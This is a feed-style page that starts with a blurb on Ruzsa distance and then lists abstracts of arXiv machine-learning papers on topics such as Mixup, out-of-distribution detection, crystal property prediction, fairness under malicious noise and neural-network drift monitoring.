    A few days ago I wrote about Jaccard distance, a way of defining a distance between sets. The Ruzsa distance is similar, except it defines the distance between two subsets of an Abelian group. Subset difference Let A and B be two subsets of an Abelian (commutative) group G. Then the difference A − B […] Ruzsa distance first appeared on John D. Cook.  ( 6 min )
  • Open

    Spectral learning of Bernoulli linear dynamical systems models. (arXiv:2303.02060v2 [stat.ML] UPDATED)
    Latent linear dynamical systems with Bernoulli observations provide a powerful modeling framework for identifying the temporal dynamics underlying binary time series data, which arise in a variety of contexts such as binary decision-making and discrete stochastic processes (e.g., binned neural spike trains). Here we develop a spectral learning method for fast, efficient fitting of probit-Bernoulli latent linear dynamical system (LDS) models. Our approach extends traditional subspace identification methods to the Bernoulli setting via a transformation of the first and second sample moments. This results in a robust, fixed-cost estimator that avoids the hazards of local optima and the long computation time of iterative fitting procedures like the expectation-maximization (EM) algorithm. In regimes where data is limited or assumptions about the statistical structure of the data are not met, we demonstrate that the spectral estimate provides a good initialization for Laplace-EM fitting. Finally, we show that the estimator provides substantial benefits to real world settings by analyzing data from mice performing a sensory decision-making task.
    MixupE: Understanding and Improving Mixup from Directional Derivative Perspective. (arXiv:2212.13381v4 [cs.LG] UPDATED)
    Mixup is a popular data augmentation technique for training deep neural networks where additional samples are generated by linearly interpolating pairs of inputs and their labels. This technique is known to improve the generalization performance in many learning paradigms and applications. In this work, we first analyze Mixup and show that it implicitly regularizes infinitely many directional derivatives of all orders. Based on this new insight, we propose an improved version of Mixup, theoretically justified to deliver better generalization performance than the vanilla Mixup. To demonstrate the effectiveness of the proposed method, we conduct experiments across various domains such as images, tabular data, speech, and graphs. Our results show that the proposed method improves Mixup across multiple datasets using a variety of architectures, for instance, exhibiting an improvement over Mixup by 0.8% in ImageNet top-1 accuracy.
    Gaussian Latent Representations for Uncertainty Estimation using Mahalanobis Distance in Deep Classifiers. (arXiv:2305.13849v2 [cs.CV] UPDATED)
    Recent works show that the data distribution in a network's latent space is useful for estimating classification uncertainty and detecting Out-of-distribution (OOD) samples. To obtain a well-regularized latent space that is conducive for uncertainty estimation, existing methods bring in significant changes to model architectures and training procedures. In this paper, we present a lightweight, fast, and high-performance regularization method for Mahalanobis distance-based uncertainty prediction, and that requires minimal changes to the network's architecture. To derive Gaussian latent representation favourable for Mahalanobis Distance calculation, we introduce a self-supervised representation learning method that separates in-class representations into multiple Gaussians. Classes with non-Gaussian representations are automatically identified and dynamically clustered into multiple new classes that are approximately Gaussian. Evaluation on standard OOD benchmarks shows that our method achieves state-of-the-art results on OOD detection with minimal inference time, and is very competitive on predictive probability calibration. Finally, we show the applicability of our method to a real-life computer vision use case on microorganism classification.
    Efficient Approximations of Complete Interatomic Potentials for Crystal Property Prediction. (arXiv:2306.10045v7 [physics.chem-ph] UPDATED)
    We study property prediction for crystal materials. A crystal structure consists of a minimal unit cell that is repeated infinitely in 3D space. How to accurately represent such repetitive structures in machine learning models remains unresolved. Current methods construct graphs by establishing edges only between nearby nodes, thereby failing to faithfully capture infinite repeating patterns and distant interatomic interactions. In this work, we propose several innovations to overcome these limitations. First, we propose to model physics-principled interatomic potentials directly instead of only using distances as in many existing methods. These potentials include the Coulomb potential, London dispersion potential, and Pauli repulsion potential. Second, we model the complete set of potentials among all atoms, instead of only between nearby atoms as in existing methods. This is enabled by our approximations of infinite potential summations with provable error bounds. We further develop efficient algorithms to compute the approximations. Finally, we propose to incorporate our computations of complete interatomic potentials into message passing neural networks for representation learning. We perform experiments on the JARVIS and Materials Project benchmarks for evaluation. Results show that the use of interatomic potentials and complete interatomic potentials leads to consistent performance improvements with reasonable computational costs. Our code is publicly available as part of the AIRS library (https://github.com/divelab/AIRS/tree/main/OpenMat/PotNet).
    TimeTuner: Diagnosing Time Representations for Time-Series Forecasting with Counterfactual Explanations. (arXiv:2307.09916v3 [cs.HC] UPDATED)
    Deep learning (DL) approaches are being increasingly used for time-series forecasting, with many efforts devoted to designing complex DL models. Recent studies have shown that the DL success is often attributed to effective data representations, fostering the fields of feature engineering and representation learning. However, automated approaches for feature learning are typically limited with respect to incorporating prior knowledge, identifying interactions among variables, and choosing evaluation metrics to ensure that the models are reliable. To improve on these limitations, this paper contributes a novel visual analytics framework, namely TimeTuner, designed to help analysts understand how model behaviors are associated with localized correlations, stationarity, and granularity of time-series representations. The system mainly consists of the following two-stage technique: We first leverage counterfactual explanations to connect the relationships among time-series representations, multivariate features and model predictions. Next, we design multiple coordinated views including a partition-based correlation matrix and juxtaposed bivariate stripes, and provide a set of interactions that allow users to step into the transformation selection process, navigate through the feature space, and reason the model performance. We instantiate TimeTuner with two transformation methods of smoothing and sampling, and demonstrate its applicability on real-world time-series forecasting of univariate sunspots and multivariate air pollutants. Feedback from domain experts indicates that our system can help characterize time-series representations and guide the feature engineering processes.
    Duet: efficient and scalable hybriD neUral rElation undersTanding. (arXiv:2307.13494v3 [cs.DB] UPDATED)
    Learned cardinality estimation methods have achieved high precision compared to traditional methods. Among learned methods, query-driven approaches face the data and workload drift problem for a long time. Although both query-driven and hybrid methods are proposed to avoid this problem, even the state-of-art of them suffer from high training and estimation costs, limited scalability, instability, and long-tailed distribution problem on high cardinality and high dimensional tables, which seriously affects the practical application of learned cardinality estimators. In this paper, we prove that most of these problems are directly caused by the widely used progressive sampling. We solve this problem by introducing predicates into the autoregressive model and propose Duet, a stable, efficient, and scalable hybrid method to estimate cardinality directly without sampling or any non-differentiable process, which can not only reduces the inference complexity from $O(n)$ to $O(1)$ compared to Naru and UAE but also achieve higher accuracy on high cardinality and high dimensional tables. Experimental results show that Duet can achieve all the design goals above and be much more practical and even has a lower inference cost on CPU than that of most learned methods on GPU.
    PlaSma: Making Small Language Models Better Procedural Knowledge Models for (Counterfactual) Planning. (arXiv:2305.19472v2 [cs.CL] UPDATED)
    Procedural planning, which entails decomposing a high-level goal into a sequence of temporally ordered steps, is an important yet intricate task for machines. It involves integrating common-sense knowledge to reason about complex contextualized situations that are often counterfactual, e.g. "scheduling a doctor's appointment without a phone". While current approaches show encouraging results using large language models (LLMs), they are hindered by drawbacks such as costly API calls and reproducibility issues. In this paper, we advocate planning using smaller language models. We present PlaSma, a novel two-pronged approach to endow small language models with procedural knowledge and (counterfactual) planning capabilities. More concretely, we develop symbolic procedural knowledge distillation to enhance the implicit knowledge in small language models and an inference-time algorithm to facilitate more structured and accurate reasoning. In addition, we introduce a novel task, Counterfactual Planning, that requires a revision of a plan to cope with a counterfactual situation. In both the original and counterfactual setting, we show that orders-of-magnitude smaller models (770M-11B parameters) can compete and often surpass their larger teacher models' capabilities.
    Non Intrusive Intelligibility Predictor for Hearing Impaired Individuals using Self Supervised Speech Representations. (arXiv:2307.13423v2 [cs.SD] UPDATED)
    Self-supervised speech representations (SSSRs) have been successfully applied to a number of speech-processing tasks, e.g. as feature extractor for speech quality (SQ) prediction, which is, in turn, relevant for assessment and training speech enhancement systems for users with normal or impaired hearing. However, exact knowledge of why and how quality-related information is encoded well in such representations remains poorly understood. In this work, techniques for non-intrusive prediction of SQ ratings are extended to the prediction of intelligibility for hearing-impaired users. It is found that self-supervised representations are useful as input features to non-intrusive prediction models, achieving competitive performance to more complex systems. A detailed analysis of the performance depending on Clarity Prediction Challenge 1 listeners and enhancement systems indicates that more data might be needed to allow generalisation to unknown systems and (hearing-impaired) individuals
    Fraunhofer SIT at CheckThat! 2023: Tackling Classification Uncertainty Using Model Souping on the Example of Check-Worthiness Classification. (arXiv:2307.02377v2 [cs.CL] UPDATED)
    This paper describes the second-placed approach developed by the Fraunhofer SIT team in the CLEF-2023 CheckThat! lab Task 1B for English. Given a text snippet from a political debate, the aim of this task is to determine whether it should be assessed for check-worthiness. Detecting check-worthy statements aims to facilitate manual fact-checking efforts by prioritizing the claims that fact-checkers should consider first. It can also be considered as primary step of a fact-checking system. Our best-performing method took advantage of an ensemble classification scheme centered on Model Souping. When applied to the English data set, our submitted model achieved an overall F1 score of 0.878 and was ranked as the second-best model in the competition.
    Factor Fields: A Unified Framework for Neural Fields and Beyond. (arXiv:2302.01226v3 [cs.CV] UPDATED)
    We present Factor Fields, a novel framework for modeling and representing signals. Factor Fields decomposes a signal into a product of factors, each represented by a classical or neural field representation which operates on transformed input coordinates. This decomposition results in a unified framework that accommodates several recent signal representations including NeRF, Plenoxels, EG3D, Instant-NGP, and TensoRF. Additionally, our framework allows for the creation of powerful new signal representations, such as the "Dictionary Field" (DiF) which is a second contribution of this paper. Our experiments show that DiF leads to improvements in approximation quality, compactness, and training time when compared to previous fast reconstruction methods. Experimentally, our representation achieves better image approximation quality on 2D image regression tasks, higher geometric quality when reconstructing 3D signed distance fields, and higher compactness for radiance field reconstruction tasks. Furthermore, DiF enables generalization to unseen images/3D scenes by sharing bases across signals during training which greatly benefits use cases such as image regression from sparse observations and few-shot radiance field reconstruction.
    Fraunhofer SIT at CheckThat! 2023: Mixing Single-Modal Classifiers to Estimate the Check-Worthiness of Multi-Modal Tweets. (arXiv:2307.00610v2 [cs.LG] UPDATED)
    The option of sharing images, videos and audio files on social media opens up new possibilities for distinguishing between false information and fake news on the Internet. Due to the vast amount of data shared every second on social media, not all data can be verified by a computer or a human expert. Here, a check-worthiness analysis can be used as a first step in the fact-checking pipeline and as a filtering mechanism to improve efficiency. This paper proposes a novel way of detecting the check-worthiness in multi-modal tweets. It takes advantage of two classifiers, each trained on a single modality. For image data, extracting the embedded text with an OCR analysis has shown to perform best. By combining the two classifiers, the proposed solution was able to place first in the CheckThat! 2023 Task 1A with an F1 score of 0.7297 achieved on the private test set.
    Formulation Graphs for Mapping Structure-Composition of Battery Electrolytes to Device Performance. (arXiv:2307.03811v2 [cond-mat.mtrl-sci] UPDATED)
    Advanced computational methods are being actively sought for addressing the challenges associated with discovery and development of new combinatorial material such as formulations. A widely adopted approach involves domain informed high-throughput screening of individual components that can be combined into a formulation. This manages to accelerate the discovery of new compounds for a target application but still leave the process of identifying the right 'formulation' from the shortlisted chemical space largely a laboratory experiment-driven process. We report a deep learning model, Formulation Graph Convolution Network (F-GCN), that can map structure-composition relationship of the individual components to the property of liquid formulation as whole. Multiple GCNs are assembled in parallel that featurize formulation constituents domain-intuitively on the fly. The resulting molecular descriptors are scaled based on respective constituent's molar percentage in the formulation, followed by formalizing into a combined descriptor that represents a complete formulation to an external learning architecture. The use case of proposed formulation learning model is demonstrated for battery electrolytes by training and testing it on two exemplary datasets representing electrolyte formulations vs battery performance -- one dataset is sourced from literature about Li/Cu half-cells, while the other is obtained by lab-experiments related to lithium-iodide full-cell chemistry. The model is shown to predict the performance metrics like Coulombic Efficiency (CE) and specific capacity of new electrolyte formulations with lowest reported errors. The best performing F-GCN model uses molecular descriptors derived from molecular graphs that are informed with HOMO-LUMO and electric moment properties of the molecules using a knowledge transfer technique.
    Experimental Study on Reinforcement Learning-based Control of an Acrobot. (arXiv:2011.09246v2 [cs.RO] UPDATED)
    We present computational and experimental results on how artificial intelligence (AI) learns to control an Acrobot using reinforcement learning (RL). Thereby the experimental setup is designed as an embedded system, which is of interest for robotics and energy harvesting applications. Specifically, we study the control of angular velocity of the Acrobot, as well as control of its total energy, which is the sum of the kinetic and the potential energy. By this means the RL algorithm is designed to drive the angular velocity or the energy of the first pendulum of the Acrobot towards a desired value. With this, libration or full rotation of the unactuated pendulum of the Acrobot is achieved. Moreover, investigations of the Acrobot control are carried out, which lead to insights about the influence of the state space discretization, the episode length, the action space or the mass of the driven pendulum on the RL control. By further numerous simulations and experiments the effects of parameter variations are evaluated.
    Deep Bradley-Terry Rating: Estimate Properties Without Metric of Unseen Items. (arXiv:2307.13709v2 [cs.LG] UPDATED)
    Many properties in the real world, such as desirability or strength in competitive environment, can't be directly observed, which makes them difficult to evaluate. To deal with this challenging problem, prior works have primarily focused on estimating those properties of known items, especially the strength of sports players, only of those who appears in paired comparison dataset. In this paper, we introduce Deep Bradley-Terry Rating (DBTR), a novel ML framework to evaluate any properties of unknown items, not necessarily present in the training data. Our method seamlessly integrates traditional Bradley-Terry model with a neural network structure. We also generalizes this architecture further for asymmetric environment with unfairness, which is much more common in real world settings. In our experimental analysis, DBTR successfully learned desired quantification of those properties.
    Deep learning of quantum entanglement from incomplete measurements. (arXiv:2205.01462v6 [quant-ph] CROSS LISTED)
    The quantification of the entanglement present in a physical system is of para\-mount importance for fundamental research and many cutting-edge applications. Currently, achieving this goal requires either a priori knowledge on the system or very demanding experimental procedures such as full state tomography or collective measurements. Here, we demonstrate that by employing neural networks we can quantify the degree of entanglement without needing to know the full description of the quantum state. Our method allows for direct quantification of the quantum correlations using an incomplete set of local measurements. Despite using undersampled measurements, we achieve a quantification error of up to an order of magnitude lower than the state-of-the-art quantum tomography. Furthermore, we achieve this result employing networks trained using exclusively simulated data. Finally, we derive a method based on a convolutional network input that can accept data from various measurement scenarios and perform, to some extent, independently of the measurement device.
    Algorithmic Gaussianization through Sketching: Converting Data into Sub-gaussian Random Designs. (arXiv:2206.10291v2 [cs.LG] UPDATED)
    Algorithmic Gaussianization is a phenomenon that can arise when using randomized sketching or sampling methods to produce smaller representations of large datasets: For certain tasks, these sketched representations have been observed to exhibit many robust performance characteristics that are known to occur when a data sample comes from a sub-gaussian random design, which is a powerful statistical model of data distributions. However, this phenomenon has only been studied for specific tasks and metrics, or by relying on computationally expensive methods. We address this by providing an algorithmic framework for gaussianizing data distributions via averaging, proving that it is possible to efficiently construct data sketches that are nearly indistinguishable (in terms of total variation distance) from sub-gaussian random designs. In particular, relying on a recently introduced sketching technique called Leverage Score Sparsified (LESS) embeddings, we show that one can construct an $n\times d$ sketch of an $N\times d$ matrix $A$, where $n\ll N$, that is nearly indistinguishable from a sub-gaussian design, in time $O(\text{nnz}(A)\log N + nd^2)$, where $\text{nnz}(A)$ is the number of non-zero entries in $A$. As a consequence, strong statistical guarantees and precise asymptotics available for the estimators produced from sub-gaussian designs (e.g., for least squares and Lasso regression, covariance estimation, low-rank approximation, etc.) can be straightforwardly adapted to our sketching framework. We illustrate this with a new approximation guarantee for sketched least squares, among other examples.
    Group Equivariant Fourier Neural Operators for Partial Differential Equations. (arXiv:2306.05697v2 [cs.LG] UPDATED)
    We consider solving partial differential equations (PDEs) with Fourier neural operators (FNOs), which operate in the frequency domain. Since the laws of physics do not depend on the coordinate system used to describe them, it is desirable to encode such symmetries in the neural operator architecture for better performance and easier learning. While encoding symmetries in the physical domain using group theory has been studied extensively, how to capture symmetries in the frequency domain is under-explored. In this work, we extend group convolutions to the frequency domain and design Fourier layers that are equivariant to rotations, translations, and reflections by leveraging the equivariance property of the Fourier transform. The resulting $G$-FNO architecture generalizes well across input resolutions and performs well in settings with varying levels of symmetry. Our code is publicly available as part of the AIRS library (https://github.com/divelab/AIRS).
    Learning Common Rationale to Improve Self-Supervised Representation for Fine-Grained Visual Recognition Problems. (arXiv:2303.01669v2 [cs.CV] UPDATED)
    Self-supervised learning (SSL) strategies have demonstrated remarkable performance in various recognition tasks. However, both our preliminary investigation and recent studies suggest that they may be less effective in learning representations for fine-grained visual recognition (FGVR) since many features helpful for optimizing SSL objectives are not suitable for characterizing the subtle differences in FGVR. To overcome this issue, we propose learning an additional screening mechanism to identify discriminative clues commonly seen across instances and classes, dubbed as common rationales in this paper. Intuitively, common rationales tend to correspond to the discriminative patterns from the key parts of foreground objects. We show that a common rationale detector can be learned by simply exploiting the GradCAM induced from the SSL objective without using any pre-trained object parts or saliency detectors, making it seamlessly to be integrated with the existing SSL process. Specifically, we fit the GradCAM with a branch with limited fitting capacity, which allows the branch to capture the common rationales and discard the less common discriminative patterns. At the test stage, the branch generates a set of spatial weights to selectively aggregate features representing an instance. Extensive experimental results on four visual tasks demonstrate that the proposed method can lead to a significant improvement in different evaluation settings.
    Reasons for the Superiority of Stochastic Estimators over Deterministic Ones: Robustness, Consistency and Perceptual Quality. (arXiv:2211.08944v3 [eess.IV] UPDATED)
    Stochastic restoration algorithms allow to explore the space of solutions that correspond to the degraded input. In this paper we reveal additional fundamental advantages of stochastic methods over deterministic ones, which further motivate their use. First, we prove that any restoration algorithm that attains perfect perceptual quality and whose outputs are consistent with the input must be a posterior sampler, and is thus required to be stochastic. Second, we illustrate that while deterministic restoration algorithms may attain high perceptual quality, this can be achieved only by filling up the space of all possible source images using an extremely sensitive mapping, which makes them highly vulnerable to adversarial attacks. Indeed, we show that enforcing deterministic models to be robust to such attacks profoundly hinders their perceptual quality, while robustifying stochastic models hardly influences their perceptual quality, and improves their output variability. These findings provide a motivation to foster progress in stochastic restoration methods, paving the way to better recovery algorithms.
    A Bayesian approach to quantifying uncertainties and improving generalizability in traffic prediction models. (arXiv:2307.05946v3 [cs.LG] UPDATED)
    Deep-learning models for traffic data prediction can have superior performance in modeling complex functions using a multi-layer architecture. However, a major drawback of these approaches is that most of these approaches do not offer forecasts with uncertainty estimates, which are essential for traffic operations and control. Without uncertainty estimates, it is difficult to place any level of trust to the model predictions, and operational strategies relying on overconfident predictions can lead to worsening traffic conditions. In this study, we propose a Bayesian recurrent neural network framework for uncertainty quantification in traffic prediction with higher generalizability by introducing spectral normalization to its hidden layers. In our paper, we have shown that normalization alters the training process of deep neural networks by controlling the model's complexity and reducing the risk of overfitting to the training data. This, in turn, helps improve the generalization performance of the model on out-of-distribution datasets. Results demonstrate that spectral normalization improves uncertainty estimates and significantly outperforms both the layer normalization and model without normalization in single-step prediction horizons. This improved performance can be attributed to the ability of spectral normalization to better localize the feature space of the data under perturbations. Our findings are especially relevant to traffic management applications, where predicting traffic conditions across multiple locations is the goal, but the availability of training data from multiple locations is limited. Spectral normalization, therefore, provides a more generalizable approach that can effectively capture the underlying patterns in traffic data without requiring location-specific models.
    Visual Pre-training for Navigation: What Can We Learn from Noise?. (arXiv:2207.00052v3 [cs.CV] UPDATED)
    One powerful paradigm in visual navigation is to predict actions from observations directly. Training such an end-to-end system allows representations useful for downstream tasks to emerge automatically. However, the lack of inductive bias makes this system data inefficient. We hypothesize a sufficient representation of the current view and the goal view for a navigation policy can be learned by predicting the location and size of a crop of the current view that corresponds to the goal. We further show that training such random crop prediction in a self-supervised fashion purely on synthetic noise images transfers well to natural home images. The learned representation can then be bootstrapped to learn a navigation policy efficiently with little interaction data. The code is available at https://yanweiw.github.io/noise2ptz
    Pre-Training with Diffusion models for Dental Radiography segmentation. (arXiv:2307.14066v2 [cs.CV] UPDATED)
    Medical radiography segmentation, and specifically dental radiography, is highly limited by the cost of labeling which requires specific expertise and labor-intensive annotations. In this work, we propose a straightforward pre-training method for semantic segmentation leveraging Denoising Diffusion Probabilistic Models (DDPM), which have shown impressive results for generative modeling. Our straightforward approach achieves remarkable performance in terms of label efficiency and does not require architectural modifications between pre-training and downstream tasks. We propose to first pre-train a Unet by exploiting the DDPM training objective, and then fine-tune the resulting model on a segmentation task. Our experimental results on the segmentation of dental radiographs demonstrate that the proposed method is competitive with state-of-the-art pre-training methods.
    Towards Out-Of-Distribution Generalization: A Survey. (arXiv:2108.13624v2 [cs.LG] UPDATED)
    Traditional machine learning paradigms are based on the assumption that both training and test data follow the same statistical pattern, which is mathematically referred to as Independent and Identically Distributed ($i.i.d.$). However, in real-world applications, this $i.i.d.$ assumption often fails to hold due to unforeseen distributional shifts, leading to considerable degradation in model performance upon deployment. This observed discrepancy indicates the significance of investigating the Out-of-Distribution (OOD) generalization problem. OOD generalization is an emerging topic of machine learning research that focuses on complex scenarios wherein the distributions of the test data differ from those of the training data. This paper represents the first comprehensive, systematic review of OOD generalization, encompassing a spectrum of aspects from problem definition, methodological development, and evaluation procedures, to the implications and future directions of the field. Our discussion begins with a precise, formal characterization of the OOD generalization problem. Following that, we categorize existing methodologies into three segments: unsupervised representation learning, supervised model learning, and optimization, according to their positions within the overarching learning process. We provide an in-depth discussion on representative methodologies for each category, further elucidating the theoretical links between them. Subsequently, we outline the prevailing benchmark datasets employed in OOD generalization studies. To conclude, we overview the existing body of work in this domain and suggest potential avenues for future research on OOD generalization. A summary of the OOD generalization methodologies surveyed in this paper can be accessed at this http URL
    Statistical process monitoring of artificial neural networks. (arXiv:2209.07436v2 [stat.ME] UPDATED)
    The rapid advancement of models based on artificial intelligence demands innovative monitoring techniques which can operate in real time with low computational costs. In machine learning, especially if we consider artificial neural networks (ANNs), the models are often trained in a supervised manner. Consequently, the learned relationship between the input and the output must remain valid during the model's deployment. If this stationarity assumption holds, we can conclude that the ANN provides accurate predictions. Otherwise, the retraining or rebuilding of the model is required. We propose considering the latent feature representation of the data (called "embedding") generated by the ANN to determine the time when the data stream starts being nonstationary. In particular, we monitor embeddings by applying multivariate control charts based on the data depth calculation and normalized ranks. The performance of the introduced method is compared with benchmark approaches for various ANN architectures and different underlying data formats.
    Efficient Alternating Minimization with Applications to Weighted Low Rank Approximation. (arXiv:2306.04169v2 [cs.LG] UPDATED)
    Weighted low rank approximation is a fundamental problem in numerical linear algebra, and it has many applications in machine learning. Given a matrix $M \in \mathbb{R}^{n \times n}$, a weight matrix $W \in \mathbb{R}_{\geq 0}^{n \times n}$, a parameter $k$, the goal is to output two matrices $U, V \in \mathbb{R}^{n \times k}$ such that $\| W \circ (M - U V^\top) \|_F$ is minimized, where $\circ$ denotes the Hadamard product. Such a problem is known to be NP-hard and even hard to approximate assuming Exponential Time Hypothesis [GG11, RSW16]. Meanwhile, alternating minimization is a good heuristic solution for approximating weighted low rank approximation. The work [LLR16] shows that, under mild assumptions, alternating minimization does provide provable guarantees. In this work, we develop an efficient and robust framework for alternating minimization. For weighted low rank approximation, this improves the runtime of [LLR16] from $n^2 k^2$ to $n^2k$. At the heart of our work framework is a high-accuracy multiple response regression solver together with a robust analysis of alternating minimization.
    Automating Model Comparison in Factor Graphs. (arXiv:2306.05965v2 [cs.LG] UPDATED)
    Bayesian state and parameter estimation have been automated effectively in a variety of probabilistic programming languages. The process of model comparison on the other hand, which still requires error-prone and time-consuming manual derivations, is often overlooked despite its importance. This paper efficiently automates Bayesian model averaging, selection, and combination by message passing on a Forney-style factor graph with a custom mixture node. Parameter and state inference, and model comparison can then be executed simultaneously using message passing with scale factors. This approach shortens the model design cycle and allows for the straightforward extension to hierarchical and temporal model priors to accommodate for modeling complicated time-varying processes.
    On Learning the Tail Quantiles of Driving Behavior Distributions via Quantile Regression and Flows. (arXiv:2305.13106v2 [cs.LG] UPDATED)
    Towards safe autonomous driving (AD), we consider the problem of learning models that accurately capture the diversity and tail quantiles of human driver behavior probability distributions, in interaction with an AD vehicle. Such models, which predict drivers' continuous actions from their states, are particularly relevant for closing the gap between AD agent simulations and reality. To this end, we adapt two flexible quantile learning frameworks for this setting that avoid strong distributional assumptions: (1) quantile regression (based on the titled absolute loss), and (2) autoregressive quantile flows (a version of normalizing flows). Training happens in a behavior cloning-fashion. We use the highD dataset consisting of driver trajectories on several highways. We evaluate our approach in a one-step acceleration prediction task, and in multi-step driver simulation rollouts. We report quantitative results using the tilted absolute loss as metric, give qualitative examples showing that realistic extremal behavior can be learned, and discuss the main insights.
    On the Vulnerability of Fairness Constrained Learning to Malicious Noise. (arXiv:2307.11892v2 [cs.LG] UPDATED)
    We consider the vulnerability of fairness-constrained learning to small amounts of malicious noise in the training data. Konstantinov and Lampert (2021) initiated the study of this question and presented negative results showing there exist data distributions where for several fairness constraints, any proper learner will exhibit high vulnerability when group sizes are imbalanced. Here, we present a more optimistic view, showing that if we allow randomized classifiers, then the landscape is much more nuanced. For example, for Demographic Parity we show we can incur only a $\Theta(\alpha)$ loss in accuracy, where $\alpha$ is the malicious noise rate, matching the best possible even without fairness constraints. For Equal Opportunity, we show we can incur an $O(\sqrt{\alpha})$ loss, and give a matching $\Omega(\sqrt{\alpha})$lower bound. In contrast, Konstantinov and Lampert (2021) showed for proper learners the loss in accuracy for both notions is $\Omega(1)$. The key technical novelty of our work is how randomization can bypass simple "tricks" an adversary can use to amplify his power. We also consider additional fairness notions including Equalized Odds and Calibration. For these fairness notions, the excess accuracy clusters into three natural regimes $O(\alpha)$,$O(\sqrt{\alpha})$ and $O(1)$. These results provide a more fine-grained view of the sensitivity of fairness-constrained learning to adversarial noise in training data.
    Efficient Interaction-Aware Interval Analysis of Neural Network Feedback Loops. (arXiv:2307.14938v1 [eess.SY])
    In this paper, we propose a computationally efficient framework for interval reachability of neural network controlled systems. Our approach builds upon inclusion functions for the neural network controller and the open-loop system. We observe that many state-of-the-art neural network verifiers can produce inclusion functions for neural networks. We introduce and analyze a new class of inclusion functions for the open-loop dynamics based on bounds of the function Jacobian that is particularly suitable for capturing the interactions between systems and neural network controllers. Next, for any dynamical system, we use inclusion functions to construct an embedding system with twice the number of states as the original system. We show that a single trajectory of this embedding system provides hyper-rectangular over-approximations of reachable sets. We then propose two approaches for constructing a closed-loop embedding system for a neural network controlled dynamical system that accounts for the interaction between the system and the controller in different ways. The interconnection-based approach accounts for the worst-case evolution of each coordinate separately by substituting the neural network inclusion function into the open-loop embedding system. The interaction-based approach uses the newly introduced class of Jacobian-based inclusion functions to fully capture first-order interactions between the system and the controller. Finally, we implement our approach in a Python framework called \texttt{ReachMM} and show that on several existing benchmarks, our methods outperform the existing approaches in the literature. We also demonstrate the scalability of our method on a vehicle platooning example with up to $200$ states.
    Nonsmooth Nonconvex-Nonconcave Minimax Optimization: Primal-Dual Balancing and Iteration Complexity Analysis. (arXiv:2209.10825v3 [math.OC] UPDATED)
    Nonconvex-nonconcave minimax optimization has gained widespread interest over the last decade. However, most existing works focus on variants of gradient descent-ascent (GDA) algorithms, which are only applicable to smooth nonconvex-concave settings. To address this limitation, we propose a novel algorithm named smoothed proximal linear descent-ascent (smoothed PLDA), which can effectively handle a broad range of structured nonsmooth nonconvex-nonconcave minimax problems. Specifically, we consider the setting where the primal function has a nonsmooth composite structure and the dual function possesses the Kurdyka-Lojasiewicz (KL) property with exponent $\theta \in [0,1)$. We introduce a novel convergence analysis framework for smoothed PLDA, the key components of which are our newly developed nonsmooth primal error bound and dual error bound. Using this framework, we show that smoothed PLDA can find both $\epsilon$-game-stationary points and $\epsilon$-optimization-stationary points of the problems of interest in $\mathcal{O}(\epsilon^{-2\max\{2\theta,1\}})$ iterations. Furthermore, when $\theta \in [0,\frac{1}{2}]$, smoothed PLDA achieves the optimal iteration complexity of $\mathcal{O}(\epsilon^{-2})$. To further demonstrate the effectiveness and wide applicability of our analysis framework, we show that certain max-structured problem possesses the KL property with exponent $\theta=0$ under mild assumptions. As a by-product, we establish algorithm-independent quantitative relationships among various stationarity concepts, which may be of independent interest.
    Exploiting Richness of Learned Compressed Representation of Images for Semantic Segmentation. (arXiv:2307.01524v2 [cs.CV] UPDATED)
    Autonomous vehicles and Advanced Driving Assistance Systems (ADAS) have the potential to radically change the way we travel. Many such vehicles currently rely on segmentation and object detection algorithms to detect and track objects around its surrounding. The data collected from the vehicles are often sent to cloud servers to facilitate continual/life-long learning of these algorithms. Considering the bandwidth constraints, the data is compressed before sending it to servers, where it is typically decompressed for training and analysis. In this work, we propose the use of a learning-based compression Codec to reduce the overhead in latency incurred for the decompression operation in the standard pipeline. We demonstrate that the learned compressed representation can also be used to perform tasks like semantic segmentation in addition to decompression to obtain the images. We experimentally validate the proposed pipeline on the Cityscapes dataset, where we achieve a compression factor up to $66 \times$ while preserving the information required to perform segmentation with a dice coefficient of $0.84$ as compared to $0.88$ achieved using decompressed images while reducing the overall compute by $11\%$.
    Learning Transfer Operators by Kernel Density Estimation. (arXiv:2210.03124v3 [cs.LG] UPDATED)
    Inference of transfer operators from data is often formulated as a classical problem that hinges on the Ulam method. The conventional description, known as the Ulam-Galerkin method, involves projecting onto basis functions represented as characteristic functions supported over a fine grid of rectangles. From this perspective, the Ulam-Galerkin approach can be interpreted as density estimation using the histogram method. In this study, we recast the problem within the framework of statistical density estimation. This alternative perspective allows for an explicit and rigorous analysis of bias and variance, thereby facilitating a discussion on the mean square error. Through comprehensive examples utilizing the logistic map and a Markov map, we demonstrate the validity and effectiveness of this approach in estimating the eigenvectors of the Frobenius-Perron operator. We compare the performance of Histogram Density Estimation(HDE) and Kernel Density Estimation(KDE) methods and find that KDE generally outperforms HDE in terms of accuracy. However, it is important to note that KDE exhibits limitations around boundary points and jumps. Based on our research findings, we suggest the possibility of incorporating other density estimation methods into this field and propose future investigations into the application of KDE-based estimation for high-dimensional maps. These findings provide valuable insights for researchers and practitioners working on estimating the Frobenius-Perron operator and highlight the potential of density estimation techniques in this area of study. Keywords: Transfer Operators; Frobenius-Perron operator; probability density estimation; Ulam-Galerkin method; Kernel Density Estimation; Histogram Density Estimation.
    Scalable Bayesian Uncertainty Quantification for Neural Network Potentials: Promise and Pitfalls. (arXiv:2212.07959v2 [physics.chem-ph] UPDATED)
    Neural network (NN) potentials promise highly accurate molecular dynamics (MD) simulations within the computational complexity of classical MD force fields. However, when applied outside their training domain, NN potential predictions can be inaccurate, increasing the need for Uncertainty Quantification (UQ). Bayesian modeling provides the mathematical framework for UQ, but classical Bayesian methods based on Markov chain Monte Carlo (MCMC) are computationally intractable for NN potentials. By training graph NN potentials for coarse-grained systems of liquid water and alanine dipeptide, we demonstrate here that scalable Bayesian UQ via stochastic gradient MCMC (SG-MCMC) yields reliable uncertainty estimates for MD observables. We show that cold posteriors can reduce the required training data size and that for reliable UQ, multiple Markov chains are needed. Additionally, we find that SG-MCMC and the Deep Ensemble method achieve comparable results, despite shorter training and less hyperparameter tuning of the latter. We show that both methods can capture aleatoric and epistemic uncertainty reliably, but not systematic uncertainty, which needs to be minimized by adequate modeling to obtain accurate credible intervals for MD observables. Our results represent a step towards accurate UQ that is of vital importance for trustworthy NN potential-based MD simulations required for decision-making in practice.
    VeML: An End-to-End Machine Learning Lifecycle for Large-scale and High-dimensional Data. (arXiv:2304.13037v2 [cs.LG] UPDATED)
